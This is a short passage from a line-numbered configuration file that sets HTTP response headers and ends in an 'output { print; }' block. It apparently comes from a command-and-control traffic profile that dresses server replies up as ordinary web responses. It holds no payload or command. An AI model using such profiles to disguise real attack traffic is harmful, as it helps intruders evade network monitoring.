"X-Content-Type-Options" "nosniff"; 70 | header "Content-Encoding" "gzip"; 71 | header "X-XSS-Protection" "1; mode=block"; 72 | header "X-Frame-Options" "SAMEORIGIN"; 73 | header "Cache-Control" "public,max-age=172800"; 74 | header "Age" "1222"; 75 | header "Alternate-Protocol" "80:quic"; 76 | output { 77 | print; 78 | } 79 | } 80 | } 81 | 82 | --------------------------------------------------------------------------------